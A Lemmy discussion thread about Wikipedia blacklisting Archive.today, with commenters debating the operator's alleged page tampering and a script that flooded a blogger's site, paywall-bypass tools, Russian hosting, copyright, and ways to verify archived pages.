Wikipedia blacklists Archive.today, starts removing 695,000 archive links

m3t00🌎🇺🇦@lemmy.world · edit-2 2 months ago

Wikipedia blacklists Archive.today, starts removing 695,000 archive links

Snot Flickerman@lemmy.blahaj.zone · edit-2 2 months ago

As someone who uses Bypass Paywalls Clean, this is so frustrating.

Bypass Paywalls Clean was chased off of the Firefox Add-Ons site, chased off of Gitlab, and chased off of Github via DMCA takedown notices for copyright infringement. It is now hosted on the Russian Gitflic.ru.

We all know Russia sucks in a litany of ways, but one way it doesn’t suck is that it is one of the few countries left that has really thrown all caution to the wind and absolutely said “fuck it” in terms of respecting the international Big Copyright norms as promoted by and deeply influenced by the USA copyright cabal (RIAA/MPAA).

We have spent the better part of two decades dealing with the DMCA being used as an outright weapon to silence information that corporations and government find inconvenient mostly because that information is wildly incriminating for them. It works especially strongly because a large amount of the world’s internet has been consolidated to the US and its vast hosting structures like AWS and Cloudflare, putting enormous amounts of the internet under the direct influence of US laws like the DMCA.

Websites like Anna’s Archive, Libgen, and Sci-Hub live because they use hosting in countries that allow them to bypass these kind of restrictions. Russia is one of the most common countries for them to host the data out of due to the lack of enforcement of copyright laws, although it is obviously not the only country that these sites use.

Until we are able to alter international copyright protections to be reasonable instead of their current over-zealously and aggressively abusive nature, we will all suffer having to risk hosting of such sites in countries that are otherwise very unsavory to be associating with.

We live in the kind of world early piracy pioneers such as the original creators of The Pirate Bay were trying to fight from becoming a reality. The American copyright cabal fought tooth and nail to change Sweden’s interpretations of copyright law so they could send these men to prison.

jaybone@lemmy.zip · 2 months ago

I’m with you on this, but let’s be careful here.

We all know Russia sucks in a litany of ways, but one way it doesn’t suck is that it is one of the few countries left that has really thrown all caution to the wind and absolutely said “fuck it” in terms of respecting the international Big Copyright norms as promoted by and deeply influenced by the USA copyright cabal (RIAA/MPAA).

I once made a YouTube video which somehow included a clip from some RT Russian TV bullshit show. (The show was in fact a direct ripoff of Gordon Ramsey’s Hell Kitchen, for which I’m sure they did not get license for.)

Some fucking Russian troll bots then DMCA’d my YouTube video, for using their clip, even though it was clearly “fair use” in US jurisdiction, and YouTube happily sucked their russian dicks and flagged and removed my video.

And my video had probably 15 views, like it wasn’t a big thing.

So they aren’t exactly the Robin Hood of free speech.

Snot Flickerman@lemmy.blahaj.zone · edit-2 2 months ago

Of course they aren’t, they will happily block information that they dislike because it’s embarrassing and incriminating to them. Skepticism should cut both ways, skeptical of those who use Russian connection to delegitimize valuable tools and the people associated with them, and skepticism of why Russia allows those things to persist providing they impact Western countries but not Russia.

Until the Western copyright situation is amended to something reasonable, we have to be skeptical in all aspects of this situation. I’d rather copyright was a reasonable length with reasonable policies so organizations didn’t have to resort to connections with Russia. In the meantime we have to work with the situation we have.

pet the cat, walk the dog@lemmy.world · 2 months ago

Not sure how this says anything about Russian copyright laws or Russian government.

yucandu@lemmy.world · 2 months ago

hey thanks, i had never heard of that bypass paywalls firefox addon

Snot Flickerman@lemmy.blahaj.zone · 2 months ago

There’s also a version for Chrome if you swing that way.

yucandu@lemmy.world · 2 months ago

I do not because I don’t like ads on Youtube, but thx.

pet the cat, walk the dog@lemmy.world · edit-2 2 months ago

Ironically, when Russia was joining the World Trade Organization in early 2010s, one requirement was for them to do something about pirate sites, namely torrent-sharing ones. So iirc the domain torrents.ru was taken away from what is now called RuTracker, and they blocked many other sites, which stay blocked to this day.

Kilgore Trout@feddit.it · edit-2 2 months ago

Is your comment in the thread about Wikipedia banning archive.today?

edit: I realised by reading other comments that many used archive.today to bypass paywalls, aside from the archival purpose Wikipedia relied on.

Snot Flickerman@lemmy.blahaj.zone · edit-2 2 months ago

Original post title was:

Until further notice: archive.today/archive.is/archive.ph/… is banned from this community for apparently being a Russian DDOS tool

And linked to the /c/ukraine community which posted it.

Also, from the Ars story:

Patokallio wasn’t able to determine who runs Archive.today but mentioned apparent aliases such as “Denis Petrov” and “Masha Rabinovich,” and described evidence that the site is operated by someone from Russia.

The reason it matters:

It makes people suspect of anything hosted in Russia, which is frustrating because there’s a lot of valuable shit hosted there by people who are not necessarily from there, such as Alexandra Elbakyan founder of Sci-Hub, who has had many accusations tossed her way due to her websites association with Russia:

In December 2019, The Washington Post reported that Elbakyan was under investigation by the US Justice Department for suspected ties to Russia’s military intelligence arm, the GRU, to steal U.S. military secrets from defense contractors. Elbakyan has denied this, saying that Sci-Hub “is not in any way directly affiliated with Russian or some other country’s intelligence,” but noting that “of course, there could be some indirect help. The same as with donations, anyone can send them; they are completely anonymous, so I do not know who exactly is donating to Sci-Hub. There could be some help that I’m simply unaware of. I can only add that I write all of Sci-Hub code and design myself and I’m doing the server’s configuration.”

We cannot take for granted that one of the reasons we have access to a large amount of archived information on the internet is often because of unsavory countries who refuse to play by the US governments copyright rules.

We also cannot take for granted how connections with those countries are used to delegitimize people providing valuable services. Bypass Paywalls Clean in particular has had a litany of people assume it’s untrustworthy because of its current hosting situation because they don’t know the history of it and how it’s been kicked off of every other public repository that was stateside.

The archive.today person fucked things up and gave people more ammunition to claim that anything and everything associated with Russian internet is untrustworthy.

Kilgore Trout@feddit.it · 2 months ago

I don’t see as relevant a possible connection of archive.today to someone based in Russia.
The only facts that should be relevant are that the manager of it is an egomaniac, andcannot be trusted.

thesmokingman@programming.dev · 2 months ago

I don’t think the issue is paywalls. I think the issue is the personal actions of the owner. I also really don’t think Russia plays into this. Again, the personal actions of the owner of achive[.]today were the reason it was removed. The site was used by the owner to personally attack someone.

DoucheBagMcSwag@lemmy.dbzer0.com · 2 months ago

And now Firefox completely bans it from even being sideloaded.

dan@upvote.au · 2 months ago

This is understandable, but at the same time, none of the anti-paywall lists are as good as archive.today. They actually have paid accounts at a bunch of paywalled sites, and use them when scraping.

CombatWombat@feddit.online · 2 months ago

Unfortunately, they’ve allegedly modified the contents of some archived articles, so even though they may do better to archive, nothing archived is of any value because it cannot be trusted.

Scrollone@feddit.it · 2 months ago

What if somebody used archive.today to bypass a paywall and then archived that using Web Archive? (So we’re sure the content stays the same)

tyler@programming.dev · 2 months ago

They’re injecting data into the sites during archive so that wouldn’t work.

0_o7@lemmy.dbzer0.com · 2 months ago

So are they removing all other websites that post lies or modify their articles to suit their narrative at times?

Fox news? MSN? CNN? BBC? Reuters? AP?

Why the sudden urge to validate the archives? How many articles have been proven to be modified?

Seems like they’ve been wanting to remove an entity the empire doesn’t control and they’re using this as a cover to do it.

WhyJiffie@sh.itjust.works · 2 months ago

that’s exactly one of the main reason they use archive sites for citations. but when an archival site does that it becomes useless.

betterdeadthanreddit@lemmy.world · 2 months ago

brianpeiris@lemmy.ca · 2 months ago

Good reminder to donate to web.archive.org

Zedstrian@sopuli.xyz · 2 months ago

While archive.org is good and more trustworthy than archive.is, it isn’t as useful for bypassing paywalls.

Goodlucksil@lemmy.dbzer0.com · 2 months ago

But Wikipedia doesn’t need to bypass paywalls, and you can bypass them yourself with a bit of work.

Zedstrian@sopuli.xyz · edit-2 2 months ago

There’s websites with paywalls that even Bypass Paywalls Clean can’t bypass. In cases that it can, it sometimes just fetches the article contents from archive.today.

That doesn’t mean an alternative shouldn’t be found, but we also shouldn’t pretend that nothing is being lost by losing access to unpaywalled sources. For practical purposes, a paywalled source means no source for most readers, unless a non-paywalled alternative can be found to replace it.

Goodlucksil@lemmy.dbzer0.com · 2 months ago

That’s good for you, and it is okay for you to use archive.today personally, as long as you block their DDoSing.

But Wikipedia does not need to bypass paywalls, and they don’t require the source to be freely (or easily) viewable to verify the info.

Deebster@infosec.pub · 2 months ago

I’m still deciding how much I agree or disagree with this. It’s true that they do cite books which you often can’t read online, but adding information backed up by a paywalled proof feels a bit “trust me bro”. E.g. I could find/create a site with an impossibly large paywall and no-one would realistically able to check my sources.

mayabuttreeks@lemmy.ca · 2 months ago

I do hope this move results in more support for the IA/Wayback Machine and helps them to update some of their crawler tech — thanks to the rise of AI, some sites are effectively (thru captchas etc.) or actively (through straight-up greed [coughRedditcough]) blocked from being archived almost entirely, which is frustrating for legit archivists/contributors.

Ganbat@lemmy.dbzer0.com · 2 months ago

For anyone curious, I looked into the DDOSing, and what was done is a simple string of JavaScript was added to archive[.]today that made a background request to the blog with a randomly generated search parameter. Every time someone looked at an archive, they unknowingly sent a request to the blog under attack.

4am@lemmy.zip · edit-2 2 months ago

If this is not an announcement, Lemmy lets you edit your post titles so you can correct that mistake instead of luring in people who think lemmy.world is also banning links using archive.today.

I’m not speculating on your intent, only pointing out that you can correct this situation instead of apologizing after the fact.

Dayroom7485@lemmy.world · edit-2 2 months ago

Good reminder to pay for journalism.

The Guardian, Le Monde, El País, Tageszeitung and many others need subscribers to stay independent of the oligarchs.

kepix@lemmy.world · 2 months ago

guardian is surviving by slowly becoming a tabloid. not sure if i would have paid for it anyway, and im not sure if this was preventable by paying for it in the first place.

🌈 vanta rainbow black 🌈@lemmy.blahaj.zone · 2 months ago

yeah and they’re also transphobic af as a policy. don’t give them a damn cent

https://www.buzzfeed.com/patrickstrudwick/guardian-staff-trans-rights-letter

can also find more stuff by just looking up “the guardian transphobia”

hector@lemmy.today · 2 months ago

I appreciate the guardian a lot more than I did before now that someone gave me a nytimes subscription, seeing how bad they are now. For the guardian’s faults, they do break some stories still, and somewhat comprehensively cover the news, perhaps better than the times, that is too busy trying to cover for Israel to even report honestly on epstein and apparently surrendered to the administration besides.

Flatfire@lemmy.ca · 2 months ago

Paying for journalism is ideal, but unfortunately makes it difficult to cite/link to a source the way Wikipedia needs as a way to ensure the information remains open and accessible.

Admittedly, I’m not familiar with these outlets enough to know if those paywalls are significant, but the problem with direct article links is that those links can change. Archival services (I suppose not archive[.]is) are important for ensuring those articles remain accessible in the format they were presented in.

I’ve come across a number of older Wikipedia articles about more minor or obscure events where links lead to local new outlet websites that no longer exist or were consumed by larger media outlets and as a result no longer provide an appropriate citation.

Venia Silente@lemmy.dbzer0.com · 2 months ago

Paying for journalism simply promotes that those who don’t pay it don’t get it ie.: more paywalls, not less.

Schmuppes@lemmy.today · edit-2 2 months ago

So what you’re saying is if we refuse to pay for journalism long enough, the journalists will eventually give up and just work for free? Not have to travel for their investigations, eat nothing and need no private home?

Dayroom7485@lemmy.world · 2 months ago

Democracy isn’t possible without an independent press.

Epstein was persecuted because the frigging Miami Herold reported about his abuses in 2018. He would have continued raping and trafficking kids for who knows how long without that. In a world where the media is owned by Epstein, that won’t happen.

sibachian@lemmy.ml · 2 months ago

what democracy? every person in the leadership of america and most of the world were either friends with epstein or on his payroll.

rumba@lemmy.zip · 2 months ago

They’re already mostly owned and working for the ultra-rich interests. There have been plenty of outlets over the years that had paying users, they’re mostly owned at this point. Those that aren’t are getting quite click-baity.

Capitalism is hard on News. Facism is worse.

Venia Silente@lemmy.dbzer0.com · 2 months ago

I haven’t said that journalists have to work for free. Just that we don’t have to be the ones who are trickled out to feed them. I doesn’t have to be “poors vs workers” unlike what the media is telling you, ya know? A better system is possible.

Dayroom7485@lemmy.world · 2 months ago

Huh, I don’t get that argument. To me, it seems that citizens paying journalists is desirable. I’m genuinely curious, who else should pay them in your view?

Venia Silente@lemmy.dbzer0.com · 2 months ago

It could be the citizens but done indirectly, for example via taxes. Even better, not all citizens: just tax the rich and put the money into a journalism pool, so the rich can’t choose to benefit any particular newspaper or editorial line.

hector@lemmy.today · 2 months ago

It’s not our fault the media decided to switch to a subscription model while not providing a product worthy of paying a subscription, even before they downgrade it every year.

It’s a problem, but one of their own making.

meep_launcher@sh.itjust.works · 2 months ago

Also remember the journalists that need support the most are local papers and news stations. The big ones have plenty of donors, and while it’s worth the support, they are less likely to completely collapse than the news that is run in your city.

Go look for that independent source. They will report more news that actually affects you as well.

m3t00🌎🇺🇦@lemmy.world · edit-2 2 months ago

https://lemmy.world/c/ukraine was where i saw this. i didn’t write it. thought lemmy would have linked to the original, was wrong. FYI

Venia Silente@lemmy.dbzer0.com · 2 months ago

Okay so, what is the currently going-for alternative that bypasses paywalls?

dude@lemmings.world · 2 months ago

I’m afraid there aren’t any. You can use the Bypass Paywalls Clean extension though

Venia Silente@lemmy.dbzer0.com · 2 months ago

Oh well, archive.today it is in the meantime I guess.

🌈 vanta rainbow black 🌈@lemmy.blahaj.zone · 2 months ago

i’ve had consistently good luck with the archive.org wayback machine

m3t00🌎🇺🇦@lemmy.world · 2 months ago

copy the headline and find the same thing free somewhere else. usually it’s a news site full of unreadable slop. pay walls used to be almost worth bypassing. no more. just another money grab, pretending to protect valuable information. not

Venia Silente@lemmy.dbzer0.com · 2 months ago

Fair point. Very few if any news sites provide unique articles.

null@lemmy.org · 2 months ago

The root of the problem is Wikipedia not having local snapshots leaves their articles vulnerable to eroding sources.

T156@lemmy.world · 2 months ago

Is it reasonable for them to keep their own local snapshots?

That’s not a trivial amount of work and data, particularly it it’s multimedia.

null@lemmy.org · 2 months ago

I think it’s a concerning issue affecting long-term viability of the platform. It’ll only get worse as time goes on and sources go offline.

Formfiller@lemmy.world · 2 months ago

That’s very 1984 of them

Maeve@kbin.earth · 2 months ago

Democracy died in daylight, the darkness hides the rotten body.

rumba@lemmy.zip · 2 months ago

It’s relatively possible it never got out of the planning stages intact.

Maeve@kbin.earth · 2 months ago

Or ever made it into planning?

Tony Bark@pawb.social · 2 months ago

I’ve switched to .md when the community mentioned something was up with the .today domain. Hopefully that one isn’t compromised.

The_Decryptor@aussie.zone · 2 months ago

It’s the same person running all of them, so yeah it is.

Tony Bark@pawb.social · 2 months ago

Damn.

betterdeadthanreddit@lemmy.world · 2 months ago

URL
archive[.]today
archive[.]fo
archive[.]is
archive[.]li
archive[.]md
archive[.]ph
archive[.]vn
archiveiya74codqgiixo33q62qlrqtkgmcitqx5u2oeqnmn5bpcbiyd[.]onion

Source

anghenfil@lemmy.blahaj.zone · 2 months ago

How does the paywall circumvention of archive.today works?

anthropozaen@feddit.org · 2 months ago

It identifies itself as a google (or other) crawler, which sites often allow and give the full content to, for better SEO.

ChaosMonkey@lemmy.dbzer0.com · 2 months ago

I guess that they genuinely owned subscriptions for popular paywalled sites.

2 months ago

Bro any archiving/scraping tool can be used for ddos u just tell it to archive the same site over and over and now u have a different IP spamming the endpoint

dan@upvote.au · edit-2 2 months ago

In this case, their CAPTCHA page intentionally included code to DoS a particular blog, sending a request to search for a random string every 300ms (search is very CPU-intensive). This was regardless of the archived site you were trying to view.

CombatWombat@feddit.online · 2 months ago

Any good archiver will check for an archived copy before making a request, and batch requests. This was very different than the attack you’re imagining — if you opened any archive.today page, it would poll a developer’s personal blog, regardless of whether you were interacting with content from that blog.

m3t00🌎🇺🇦@lemmy.world · 2 months ago

don’t know all the details. fyi basically. i forget where i saw the same site mentioned for the same thing. don’t call me bro Bro

RobotToaster@mander.xyz · 2 months ago

Everyone seems to be ignoring the fact that he only did this in response to a malicious dox attempt.

Em Adespoton@lemmy.ca · 2 months ago

He only modified archived pages in response to a dox attempt?

And the thing is, the discovery of the modified pages revealed that it wasn’t even the first time he’d modified pages. And he used a real person’s identity to try and shift blame.

Irrespective of the doxxing allegations, if he’s done all this multiple times already, it means the page archives can’t be trusted AND there’s no guarantee that anything archived with the service will be available tomorrow.

Seems like we need to switch to URLs that contain the SHA256 of the page they’re linking to, so we can tell if anything has changed since the link was created.

deathbird@mander.xyz · 2 months ago

Actually a pretty good idea.

Em Adespoton@lemmy.ca · 2 months ago

Only works for archived pages though, because for any regular page, a large portion of the page will be dynamically generated; hashing the HTML will only say the framework hasn’t changed.

conorab@lemmy.conorab.com · 2 months ago

You would need a way of verifying that the SHA256 is a true copy of the site at the time though and not a faked page. You could do something like have a distributed network of archives that coordinate archival at the same time and then using the SHA256 then be able to see which archives fetched exactly the same page at the same time through some search functionality. I mean if addons are already being used for doing the crawling then we may be mostly there already since said addons would just need to certify their archive and after that they can discard the actual copy of the page. You need need a way to validate those workers though since a bad actor could just run a whole bunch at the same time to legitimise a fake archival.

Em Adespoton@lemmy.ca · edit-2 2 months ago

The idea is to verify the archival copy’s URL, not to verify the original content. So yes, a server could push different content to the archiver than to people, or vary by region, or an AitM could modify the content as it goes out to the archiver. But adding the sha256 in the URL query parameter means that if someone publishes a link to an archive copy online, anyone else using the link can know they’re looking at the same content the other person was referencing.

If the archive content changes, that URL will be invalid; if someone uses a fake hash, the URL will be invalid (which is why MD5 wouldn’t be appropriate).

The beauty of this technique is that query parameters are generally ignored if unsupported by the web server, so any archival service could start using this technique today, and all it would require is a browser extension to validate the parameter.

Link it to something like Web of Trust, and you’ve solved the separate issue you described.

In fact, this is a feature WoT could add to their extension today, and it would “Just Work”. For that matter, Archive.org could add it to their extension today, too.

Remind me to ping Jason about that.

The_Decryptor@aussie.zone · 2 months ago

Seems like we need to switch to URLs that contain the SHA256 of the page they’re linking to, so we can tell if anything has changed since the link was created.

IPFS says hi

Em Adespoton@lemmy.ca · 2 months ago

Yes; the problem IPFS has is the same problem IPv6 has.

The hash-in-a-URL solution can function cleanly in the background on top of what people already use.

The_Decryptor@aussie.zone · 2 months ago

IPFS has gateways though, so you can link to the latest version of a page which can be updated by the owner, or alternatively link to a specific revision of the page that is immutable and can’t be forged.

dan@upvote.au · 2 months ago

It wasn’t a dox attempt though. The blog just collected information that was already publicly available on other sites.

betterdeadthanreddit@lemmy.world · 2 months ago

As they should since it doesn’t matter.

Snot Flickerman@lemmy.blahaj.zone · edit-2 2 months ago

Yeah, someone being shitty to you doesn’t mean go you full-fledged shitty in return, it kind of proves your lack of trustworthiness to begin with. It’s like Nazis being like “leftists were mean to me by explaining how my politics made me a Nazi, so I’m gonna show them by Nazi-ing even harder! They forced me to be like this!” It kind of betrays the argument that the reason you got that way was because leftists were mean to you.

Anon518@sh.itjust.works · 2 months ago

Unfortunately, they shot themselves in the foot by responding the way they did. They basically did the job of anyone who wants them taken down and not trusted. It was probably the worst way they could have reacted. Such a tragedy to lose such a valuable website.

𝚝𝚛𝚔@aussie.zone · 2 months ago

Who cares why they did it?

It proves they can and do alter the “archived” website, so it’s usefulness as a source is completely gone.

RobotToaster@mander.xyz · 2 months ago

Archiving a site inherently requires altering it, to change embed URLs, scripts, etc. The fact they had that capability was never in question.

deathbird@mander.xyz · 2 months ago

Yeah, ESH. His response of editing an archive showed the site to be unreliable as an archive. DDOSing from the site as a counter to the dox attempt caused the site serious reputational harm as well.

It sucks because his site was actually more reliable than The Internet Archive.